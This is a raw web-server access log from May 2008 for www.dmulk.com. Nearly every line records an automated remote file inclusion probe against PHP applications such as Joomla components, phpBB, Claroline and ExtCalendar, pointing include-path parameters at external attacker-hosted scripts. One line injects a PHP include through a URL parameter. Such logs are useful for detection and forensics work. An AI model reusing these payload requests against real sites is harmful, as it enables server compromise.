70.84.106.68 - - [29/May/2008:09:15:22 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:15:22 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:15:33 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:15:42 -0700] "GET /logs/access_080327.log/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:16:36 -0700] "GET /logs/access_080312.log/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_peoplebook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:16:36 -0700] "GET /ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_peoplebook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:16:36 -0700] "GET /logs/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_peoplebook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:09:16:49 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:09:16:50 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:16:52 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:16:52 -0700] "GET //administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:16:52 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:16:56 -0700] "GET //administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:09:16:59 -0700] "GET /logs/access_080327.log/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:09:17:25 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:09:17:31 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:17:31 -0700] "GET /classes/core/language.php?rootdir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.138.200.188 - - [29/May/2008:09:17:38 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:17:42 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:17:43 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.138.200.188 - - [29/May/2008:09:17:47 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.55.115 - - [29/May/2008:09:17:55 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
200.62.55.115 - - [29/May/2008:09:17:55 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:18:03 -0700] "GET /logs/access_080301.log//trans/trans.php?trans=fr&page=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:18:32 -0700] "GET /logs/access_080303.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:18:32 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:18:33 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:18:39 -0700] "GET /logs/access_080315.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:09:18:40 -0700] "GET /logs/access_080303.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_galleria&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:09:18:41 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_galleria&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:09:18:41 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_galleria&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:18:45 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:09:19:33 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_galleria&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:09:20:08 -0700] "GET /send_reminders.php?includedir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:09:20:09 -0700] "GET /send_reminders.php?includedir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:20:11 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:20:11 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:20:26 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:20:32 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:20:33 -0700] "GET //administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:20:33 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:09:20:38 -0700] "GET /logs/access_080201.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:09:20:38 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:09:20:39 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:09:20:45 -0700] "GET /send_reminders.php?includedir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:20:49 -0700] "GET /logs/access_080303.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:20:51 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:20:53 -0700] "GET /logs/access_080315.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:21:06 -0700] "GET /logs/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_peoplebook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:21:06 -0700] "GET /ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_peoplebook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:09:21:24 -0700] "GET /logs/access_080215.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:21:24 -0700] "GET /logs/access_080303.log/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:21:25 -0700] "GET /errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:21:25 -0700] "GET /logs/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:21:33 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:21:33 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:09:21:55 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:22:11 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:22:19 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:09:22:24 -0700] "GET /ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.173.42 - - [29/May/2008:09:22:31 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [29/May/2008:09:22:31 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:22:32 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:22:32 -0700] "GET //include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:22:33 -0700] "GET /logs//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:22:36 -0700] "GET /logs/access_080308.log/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_peoplebook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:22:45 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:09:22:45 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:22:47 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.154.47 - - [29/May/2008:09:22:53 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
69.57.154.47 - - [29/May/2008:09:22:54 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.246.7.234 - - [29/May/2008:09:23:03 -0700] "GET /logs/access_080201.log/index.php?pagina=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:09:23:12 -0700] "GET /logs/access.log/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:09:23:12 -0700] "GET /ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:09:23:13 -0700] "GET /logs/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.7.234 - - [29/May/2008:09:23:13 -0700] "GET /index.php?pagina=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.7.234 - - [29/May/2008:09:23:13 -0700] "GET /logs/index.php?pagina=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:09:23:29 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:23:29 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:23:30 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:23:30 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:23:33 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:23:33 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:23:33 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [29/May/2008:09:23:57 -0700] "GET /send_reminders.php?includedir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:09:24:07 -0700] "GET /logs/access_080201.log//index.php?pagina=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:09:24:08 -0700] "GET //index.php?pagina=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:09:24:09 -0700] "GET /logs//index.php?pagina=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:09:24:23 -0700] "GET /logs/access_071219.log/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:24:23 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:24:23 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:24:23 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:24:23 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:24:23 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:24:24 -0700] "GET //index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.802" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:24:24 -0700] "GET //index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.802" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:24:25 -0700] "GET /logs//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
67.19.160.58 - - [29/May/2008:09:24:25 -0700] "GET /logs//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:24:25 -0700] "GET /logs/access.log/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:24:26 -0700] "GET /errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:24:26 -0700] "GET /logs/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:24:59 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
